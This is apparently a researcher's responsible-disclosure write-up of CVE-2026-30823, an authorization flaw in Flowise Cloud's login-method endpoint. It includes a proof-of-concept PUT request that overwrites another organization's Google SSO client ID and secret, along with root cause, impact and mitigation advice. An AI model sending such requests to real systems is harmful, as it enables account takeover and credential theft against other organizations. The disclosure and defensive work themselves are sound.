Introduction

This post documents a security vulnerability I identified in the FlowiseAI platform.

The issue is an Insecure Direct Object Reference (IDOR) combined with a Business Logic flaw in the authentication configuration endpoint responsible for managing SSO providers.

The vulnerability allows a low-privileged user to modify the authentication configuration of other organizations by manipulating the organizationId parameter.

The issue has been assigned CVE-2026–30823.

Summary

A critical authorization vulnerability exists in Flowise's authentication configuration API.

The endpoint PUT /api/v1/loginmethod accepts an organizationId parameter from the request body but does not validate whether the authenticated user actually belongs to or has administrative control over the referenced organization.

Because of this missing authorization check, a low-privileged user can:

  • Modify the SSO configuration of any organization
  • Enable Enterprise-only authentication features such as SSO/SAML
  • Redirect authentication flows to attacker-controlled OAuth applications
  • Potentially perform account takeover attacks

Affected Component

Endpoint

PUT /api/v1/loginmethod

Platform

Flowise Cloud

Functionality

Organization authentication provider configuration

Root Cause Analysis

The vulnerability originates from missing authorization validation when processing the organizationId parameter.

The backend logic directly accepts the organizationId supplied in the JSON request body and applies configuration updates to the corresponding organization record in the database.

However, the server does not verify whether:

request.user.organizationId === body.organizationId

or whether the authenticated user has administrative privileges over the specified organization.

As a result, any authenticated user can submit requests referencing arbitrary organization IDs and modify their authentication configuration.

This creates a classic IDOR vulnerability combined with a business logic failure, since authentication configuration is expected to be restricted to organization administrators.

Proof of Concept (PoC)

Prerequisites

  • Flowise Cloud account (Free tier is sufficient)
  • Valid authenticated session or JWT token
  • Knowledge of a target organizationId

Malicious Request

An attacker sends the following request:

PUT /api/v1/loginmethod HTTP/2
Host: cloud.flowiseai.com
Cookie: token=<ATTACKER_JWT_TOKEN>
Content-Type: application/json
Accept: application/json

{
  "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
  "userId": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
  "providers": [
    {
      "providerLabel": "Google",
      "providerName": "google",
      "config": {
        "clientID": "ATTACKER_MALICIOUS_CLIENT_ID",
        "clientSecret": "ATTACKER_MALICIOUS_SECRET"
      },
      "status": "enable"
    }
  ]
}

Server Response

{
  "status": "OK",
  "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d"
}

The response confirms that the authentication configuration of the target organization has been successfully modified.

Impact

Account Takeover

An attacker can replace legitimate OAuth configuration values such as Google Client ID or Client Secret with credentials belonging to a malicious OAuth application.

When users from the targeted organization attempt to authenticate via SSO, the authentication flow may redirect them to the attacker-controlled application.

This may allow attackers to:

  • Hijack authentication sessions
  • Capture authorization tokens
  • Perform credential harvesting attacks

License Control Bypass

The vulnerability also allows users on the Free plan to enable authentication providers normally restricted to Enterprise plans.

SSO providers such as:

  • Google
  • Azure AD
  • Okta
  • SAML providers

can be enabled without proper licensing enforcement.

CVSS Consideration

The vulnerability corresponds approximately to the following CVSS v3.1 vector:

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L
Estimated score: High

Mitigation

The issue can be mitigated by enforcing strict authorization checks when processing organization-scoped configuration changes.

Recommended remediation:

  • Validate that the authenticated user belongs to the referenced organization
  • Ensure the user has administrative privileges
  • Avoid trusting sensitive identifiers provided by the client
  • Enforce server-side authorization middleware for organization-level operations

Responsible Disclosure

The vulnerability was responsibly disclosed to the FlowiseAI team and assigned CVE-2026–30823.

References

FlowiseAI https://flowiseai.com

CVE Record https://www.cve.org/CVERecord?id=CVE-2026-30823